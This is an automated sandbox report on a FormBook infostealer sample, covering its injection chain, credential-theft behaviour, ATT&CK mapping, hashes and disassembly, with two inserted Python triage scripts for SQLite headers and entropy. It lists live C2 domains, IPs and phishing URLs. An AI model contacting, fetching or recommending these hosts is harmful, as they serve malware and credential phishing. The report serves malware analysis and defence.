            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: WIN_VISTA
            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: WIN_7
            Source: CITA#U00c7#U00c3O.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket | 0_2_004652BE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_00476619
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject | 0_2_0046CEF3
            MITRE ATT&CK Matrix (a number before a technique name is the count of matched signatures for that technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1519260 | Sample: CITA#U00c7#U00c3O.exe | Startdate: 26/09/2024 | Architecture: WINDOWS | Score: 100
            Contacted domains: www.woshop.online, www.tekilla.wtf, 19 other IPs or domains
            Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
            CITA#U00c7#U00c3O.exe [1] (started)
                Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                svchost.exe (started)
                    Signatures: Maps a DLL or memory area into another process
                    DJonRIGNYjBRZ.exe (injected)
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        netbtugc.exe [13] (started)
                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                            DJonRIGNYjBRZ.exe (injected)
                                www.nobartv6.website 103.224.182.242, ports 49774, 49775, 49776, TRELLIAN-AS-APTrellianPtyLimitedAU Australia
                                www.kexweb.top 63.250.47.40, ports 49754, 49755, 49756, NAMECHEAP-NETUS United States
                                9 other IPs or domains
                                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                            firefox.exe (started)

Source | Detection | Scanner | Label
CITA#U00c7#U00c3O.exe | 63% | ReversingLabs | Win32.Backdoor.FormBook
CITA#U00c7#U00c3O.exe | 100% | Avira | HEUR/AGEN.1321671
CITA#U00c7#U00c3O.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519260
Start date and time: 2024-09-26 09:22:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CITA#U00c7#U00c3O.exe (renamed because original name is a hash value)
Original Sample Name: CITAO.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@14/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 55
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 92.204.80.11
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information
• Report size exceeded maximum capacity and may have missing disassembly code
• VT rate limit hit for: CITA#U00c7#U00c3O.exe
Time | Type | Description
03:24:07 | API Interceptor | 9836727x Sleep call for process: netbtugc.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    172.191.244.62CYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                    • www.lurknlarkk.xyz/cjjz/
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                    • www.hermesmilano.xyz/f3mz/
                                                    DN.exeGet hashmaliciousFormBookBrowse
                                                    • www.hermesmilano.xyz/f3mz/
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • www.tekilla.wtf/fpzw/
                                                    GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                    • www.hermesmilano.xyz/lmxx/
                                                    63.250.47.40CYTAT.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    ES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.brupack.online/t8b6/
                                                    PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
                                                    • www.balclub.top/n6ow/
                                                    PO #86637.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/3bdq/
                                                    ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/mfb2/
                                                    ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.kexweb.top/mfb2/
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.nobartv6.websiteCotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                    • 103.224.182.242
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| | PAGO $830.900.exe | malicious | FormBook | 103.224.182.242 |
| | PO #86637.exe | malicious | FormBook | 103.224.182.242 |
| | RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exe | malicious | FormBook | 103.224.182.242 |
| | COTIZACION 290824.exe | malicious | FormBook | 103.224.182.242 |
| | New_Order_Big_Bag_PDF.exe | malicious | FormBook | 103.224.182.242 |
| webredir.vip.gandi.net | rP0n___87004354.exe | malicious | FormBook | 217.70.184.50 |
| | CYTAT.exe | malicious | FormBook | 217.70.184.50 |
| | Cotizaci#U00f3n.exe | malicious | FormBook | 217.70.184.50 |
| | ES-241-29335_pdf.exe | malicious | FormBook | 217.70.184.50 |
| | RECIEPT.PDF.exe | malicious | FormBook | 217.70.184.50 |
| | PO# Q919240.exe | malicious | FormBook | 217.70.184.50 |
| | PO098765678.exe | malicious | FormBook | 217.70.184.50 |
| | PAGO $830.900.exe | malicious | FormBook | 217.70.184.50 |
| | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 217.70.184.50 |
| | FATURALAR PDF.exe | malicious | FormBook | 217.70.184.50 |
| www.elsupertodo.net | CYTAT.exe | malicious | FormBook | 148.72.152.174 |
| | Cotizaci#U00f3n.exe | malicious | FormBook | 148.72.152.174 |
| | PO# Q919240.exe | malicious | FormBook | 148.72.152.174 |
| | PAGO $830.900.exe | malicious | FormBook | 148.72.152.174 |
| | FATURALAR PDF.exe | malicious | FormBook | 148.72.152.174 |
| | PO #86637.exe | malicious | FormBook | 148.72.152.174 |
| | COTIZACION 290824.exe | malicious | FormBook | 148.72.152.174 |
| | COTIZACION 280824.exe | malicious | FormBook | 148.72.152.174 |
| www.kexweb.top | CYTAT.exe | malicious | FormBook | 63.250.47.40 |
| | Cotizaci#U00f3n.exe | malicious | FormBook | 63.250.47.40 |
| | PO# Q919240.exe | malicious | FormBook | 63.250.47.40 |
| | PAGO $830.900.exe | malicious | FormBook | 63.250.47.40 |
| | PO #86637.exe | malicious | FormBook | 63.250.47.40 |
| | COTIZACION 290824.exe | malicious | FormBook | 63.250.47.40 |
| | ORDER_pdf.exe | malicious | FormBook | 63.250.47.40 |
| | ORDER_38746_pdf.exe | malicious | FormBook | 63.250.47.40 |
| Match (ASN, country) | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| ATT-INTERNET4 (US) | https://is.gd/fxcRir | malicious | Unknown | 13.32.27.6 |
| | https://cancelar-plan-pr0teccion1.w3spaces.com/ | malicious | Unknown | 13.32.27.23 |
| | https://mail-105280.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.67 |
| | https://telstra-104088.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.68 |
| | https://mail-104478.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.67 |
| | https://telstra-102246.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.12 |
| | https://telstra-104752.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.68 |
| | https://telstra-100710.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.68 |
| | https://netzero-webmail-106103.weeblysite.com/ | malicious | HTMLPhisher | 13.32.27.68 |
| | https://sky-108991.weeblysite.com/ | malicious | Unknown | 13.32.27.3 |
| AMAZON-02 (US) | ADNOC requesting RFQ.exe | malicious | FormBook | 54.228.54.207 |
| | http://tiktoksc.xyz/ | malicious | Unknown | 54.231.203.153 |
| | http://tiktok1688.cc/ | malicious | Unknown | 52.219.128.16 |
| | https://tkshopax1.cc/ | malicious | Unknown | 54.231.229.193 |
| | https://tiktok-shopsxx.top/ | malicious | Unknown | 52.217.115.225 |
| | https://sparebankno-privat.netlify.app/ | malicious | Unknown | 35.156.224.161 |
| | envifa.vbs | malicious | Unknown | 52.216.57.225 |
| | http://banlombiavirtusucursalyfgdsffg.vercel.app/ | malicious | Unknown | 76.76.21.98 |
| | http://banlombiasucursalvirtughasd.vercel.app/ | malicious | Unknown | 143.204.98.115 |
| | http://cancelarcompravirtusucursajgbf-9mfi.vercel.app/ | malicious | Unknown | 76.76.21.98 |
| NAMECHEAP-NET (US) | ADNOC requesting RFQ.exe | malicious | FormBook | 162.0.236.169 |
| | https://ldubsinvesting.com/a/g/bqcfb/bwviud/YW1hbmRhLnlhcEBleGlzLXRlY2guY29t | malicious | HTMLPhisher | 198.54.115.105 |
| | https://recommendationshaft-facc4a.ingress-comporellon.ewp.live/wp-content/plugins/Suspendisse-vitae/pages/region.php | malicious | Unknown | 63.250.43.6 |
| | https://zerovoid-voidic-facc4a.ingress-erytho.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.php | malicious | Unknown | 63.250.43.132 |
| | https://yw2tr-d6987d.ingress-bonde.ewp.live/wp-content/plugins/deviswetransfer%202/log.php | malicious | Unknown | 63.250.43.2 |
| | https://dji.repair/wnfslydy.php | malicious | Unknown | 162.0.238.241 |
| | inquiry.exe | malicious | Snake Keylogger, VIP Keylogger | 192.64.117.204 |
| | PO5118000306 pdf.exe | malicious | FormBook | 162.0.238.43 |
| | http://hscpoly.marksbookspace.shop/?/Hscpoly/Hscpoly#Bob.Jenkins@Hscpoly.Com## | malicious | Captcha Phish, HTMLPhisher | 192.64.119.254 |
| | PO For Bulk Order.exe | malicious | FormBook | 199.192.19.19 |
                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
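The "File Type" line above is a decode of the fixed 100-byte SQLite 3 header, and the preview bears it out: the visible `8` (0x38 = 56) is the page count and the `$` (0x24) is the schema cookie. Two checks a triager wants before opening a dropped database: that the header fields parse at all, and that page size × page count (2048 × 56 = 114688) equals the reported file size, which it does here, so the file is not truncated. The following is an added example, not Joe Sandbox code; the header bytes are constructed to carry the field values reported above.

```python
"""Parse the 100-byte SQLite 3 file header (the fields summarised in the
'File Type' line). Added example, not Joe Sandbox code. build_header() is a
constructed sample input carrying the values reported for the dropped database:
page size 2048, change counter 2, 56 pages, schema cookie 0x24, schema format 4,
UTF-8, version-valid-for 2, SQLITE_VERSION_NUMBER 3035005 (= 3.35.5)."""
import struct

MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the header fields (all multi-byte integers are big-endian)."""
    if len(data) < 100 or data[:16] != MAGIC:
        raise ValueError("not an SQLite 3 database")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:  # the value 1 encodes a 65536-byte page
        page_size = 65536
    fields = {
        "page_size": page_size,
        "write_version": data[18],            # 1 = rollback journal, 2 = WAL
        "read_version": data[19],
        "change_counter": struct.unpack_from(">I", data, 24)[0],
        "db_pages": struct.unpack_from(">I", data, 28)[0],
        "schema_cookie": struct.unpack_from(">I", data, 40)[0],
        "schema_format": struct.unpack_from(">I", data, 44)[0],
        "encoding": ENCODINGS.get(struct.unpack_from(">I", data, 56)[0], "unknown"),
        "version_valid_for": struct.unpack_from(">I", data, 92)[0],
        "sqlite_version": struct.unpack_from(">I", data, 96)[0],
    }
    v = fields["sqlite_version"]  # encoded as MMMmmmppp
    fields["sqlite_version_str"] = f"{v // 1_000_000}.{v // 1000 % 1000}.{v % 1000}"
    # A file shorter than this has lost pages (partial copy, interrupted exfil).
    fields["expected_file_size"] = fields["page_size"] * fields["db_pages"]
    return fields


def build_header(page_size=2048, change_counter=2, db_pages=56, schema_cookie=0x24,
                 schema_format=4, encoding=1, version_valid_for=2,
                 sqlite_version=3035005) -> bytes:
    """Construct a header with the given field values (constructed sample input)."""
    hdr = bytearray(100)
    hdr[0:16] = MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1          # legacy read/write format
    hdr[21], hdr[22], hdr[23] = 64, 32, 32  # payload fractions, fixed by the format
    struct.pack_into(">I", hdr, 24, change_counter)
    struct.pack_into(">I", hdr, 28, db_pages)
    struct.pack_into(">I", hdr, 40, schema_cookie)
    struct.pack_into(">I", hdr, 44, schema_format)
    struct.pack_into(">I", hdr, 56, encoding)
    struct.pack_into(">I", hdr, 92, version_valid_for)
    struct.pack_into(">I", hdr, 96, sqlite_version)
    return bytes(hdr)


if __name__ == "__main__":
    for key, value in parse_sqlite_header(build_header()).items():
        print(f"{key:>20}: {value}")
```

Against a real dropped file, read the first 100 bytes and compare `expected_file_size` with the size on disk; a browser profile database that is being copied out by an infostealer is often caught mid-write, and a short file is the first sign.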
                                                    Process:C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):286720
                                                    Entropy (8bit):7.994695889020294
                                                    Encrypted:true
                                                    SSDEEP:6144:NEQsw0f/fqO6JlDnqw4saEU+wXjeRMx0UwZAfmxJAZb3ND73:JWf6O6nnJzwyMOUq3AZbN
                                                    MD5:67A3D610BA763BF9CE42D8F788A9F942
                                                    SHA1:0D6A3D6A8A1F0A3B4AB71DCDFCCA0F90784E0060
                                                    SHA-256:EAD20351C361ABC7AB3E8A1D0CEB67472A15635EC8F032D6FECB69A29F19474A
                                                    SHA-512:4B89C6225C71DA817E3F6DA5DB246DF186FE6CA88E2E66BB9D5A9F5BFF88F03AD89765BEB83AD28F1135466A35950D8BA0180D019078A50E9D052DF5200C0D80
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.b...JZ8Y...^.....X1...z4B...C4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6.X2Z6E.9J.1.b.@....?_1xB(W= V'z[8-Z.#oS/wD76.3Vz.x.zU6'QoZB;nW6BX2Z8#S>.gX>..!0..*0.X....:5.P....T&.U..."?..Q9:.*=.YC4AWO1J.sBX~[9Z.`.8YC4AWO1.W4CS3Q8Z.3JZ8YC4AWO!^W6BH2Z8:V7JZxYC$AWO3JW0BX2Z8ZR1JZ8YC4AW/5JW4BX2Z8ZP7..8YS4AGO1JW&BX"Z8ZR7JJ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4Ay;T2#6BXV.<ZR'JZ8.G4AGO1JW6BX2Z8ZR7Jz8Y#4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AWO1JW6BX2Z8ZR7JZ8YC4AW
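The "Encrypted: true" verdict on the 286720-byte blob above rests on its 8-bit entropy of 7.9947 bits per byte, close to the 8.0 maximum. The caveat is that compressed data scores the same, so entropy alone says "not plaintext, not ordinary code", not "encrypted". The added example below (not Joe Sandbox code) implements the measurement and a windowed profile that locates where in a buffer the high-entropy region sits; the inputs are constructed, with a seeded PRNG standing in for ciphertext, and the 7.9 cut-off is an assumption of this example.

```python
"""8-bit Shannon entropy behind the 'Entropy (8bit)' / 'Encrypted' fields, plus a
windowed scan that locates a high-entropy region inside a larger buffer. Added
example, not Joe Sandbox code. Inputs are constructed; ENCRYPTED_THRESHOLD is an
assumed cut-off, not the sandbox's."""
import math
import random
from collections import Counter

ENCRYPTED_THRESHOLD = 7.9   # assumption: bits/byte above which a region is treated as packed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    """Heuristic only: compressed archives and images score the same as ciphertext."""
    return shannon_entropy(data) >= threshold


def entropy_profile(data: bytes, window: int = 4096) -> list:
    """Entropy of each fixed-size window, in file order."""
    return [shannon_entropy(data[i:i + window]) for i in range(0, len(data), window)]


def high_entropy_span(data: bytes, window: int = 4096, threshold: float = ENCRYPTED_THRESHOLD):
    """(start, end) byte offsets of the first run of windows at or above threshold, or None."""
    start = None
    for idx, e in enumerate(entropy_profile(data, window)):
        off = idx * window
        if e >= threshold and start is None:
            start = off
        elif e < threshold and start is not None:
            return start, off
    return (start, len(data)) if start is not None else None


# Constructed sample: 12 KiB of zeros and 4 KiB of a two-byte pattern (low entropy),
# followed by 64 KiB from a seeded PRNG standing in for an encrypted payload.
_rng = random.Random(1519260)
LOW = b"\x00" * 12288 + b"MZ" * 2048
HIGH = bytes(_rng.getrandbits(8) for _ in range(65536))
SAMPLE = LOW + HIGH

if __name__ == "__main__":
    print(f"whole buffer : {shannon_entropy(SAMPLE):.4f} bits/byte, encrypted={looks_encrypted(SAMPLE)}")
    print(f"payload only : {shannon_entropy(HIGH):.4f} bits/byte, encrypted={looks_encrypted(HIGH)}")
    print(f"high-entropy span: {high_entropy_span(SAMPLE)}")
```

Note that the whole constructed buffer scores well under the threshold while the payload region scores above it; the same averaging effect is why the dropped blob, which is high-entropy end to end, is flagged but a carrier executable with an appended encrypted payload may not be, and why the per-section and per-window view matters.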
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.536706033611225
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:CITA#U00c7#U00c3O.exe
                                                    File size:1'353'653 bytes
                                                    MD5:05643e059a165f8b6b3b3e4bd0d9f226
                                                    SHA1:c1ba7b632f31db543ef178fbd9d48809bf1c2eca
                                                    SHA256:ec4594c01b27748273f47aeefc3fc2f3bc67af0b55a72ccd129936bfb0b715b1
                                                    SHA512:e6a2c6334cdc6c9a4d2eef09212fc0d8e7590eddd1a26a9d6fce58edfc1d75766c6a3492848f81f46a8e0efac54d6ef3b2ae2902beb7f3ef38d3e9e39089a433
                                                    SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCIlRLBaKj3owIU92HBvywGMK:7JZoQrbTFZY1iaCIlR1aKj3os9WBvij
                                                    TLSH:AD55F122F5D68076C1B323B19E7EF7AA9A3D79360336D19737C82D211EA05412B39763
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                    Icon Hash:1733312925935517
                                                    Entrypoint:0x4165c1
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                    Instruction
                                                    call 00007FB944F0F06Bh
                                                    jmp 00007FB944F05EDEh
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    push ebp
                                                    mov ebp, esp
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [ebp+0Ch]
                                                    mov ecx, dword ptr [ebp+10h]
                                                    mov edi, dword ptr [ebp+08h]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FB944F0605Ah
                                                    cmp edi, eax
                                                    jc 00007FB944F061F6h
                                                    cmp ecx, 00000080h
                                                    jc 00007FB944F0606Eh
                                                    cmp dword ptr [004A9724h], 00000000h
                                                    je 00007FB944F06065h
                                                    push edi
                                                    push esi
                                                    and edi, 0Fh
                                                    and esi, 0Fh
                                                    cmp edi, esi
                                                    pop esi
                                                    pop edi
                                                    jne 00007FB944F06057h
                                                    jmp 00007FB944F06432h
                                                    test edi, 00000003h
                                                    jne 00007FB944F06066h
                                                    shr ecx, 02h
                                                    and edx, 03h
                                                    cmp ecx, 08h
                                                    jc 00007FB944F0607Bh
                                                    rep movsd
                                                    jmp dword ptr [00416740h+edx*4]
                                                    mov eax, edi
                                                    mov edx, 00000003h
                                                    sub ecx, 04h
                                                    jc 00007FB944F0605Eh
                                                    and eax, 03h
                                                    add ecx, eax
                                                    jmp dword ptr [00416654h+eax*4]
                                                    jmp dword ptr [00416750h+ecx*4]
                                                    nop
                                                    jmp dword ptr [004166D4h+ecx*4]
                                                    nop
                                                    inc cx
                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                    inc cx
                                                    add byte ptr [ebx], ah
                                                    ror dword ptr [edx-75F877FAh], 1
                                                    inc esi
                                                    add dword ptr [eax+468A0147h], ecx
                                                    add al, cl
                                                    jmp 00007FB94737E857h
                                                    add esi, 03h
                                                    add edi, 03h
                                                    cmp ecx, 08h
                                                    jc 00007FB944F0601Eh
                                                    rep movsd
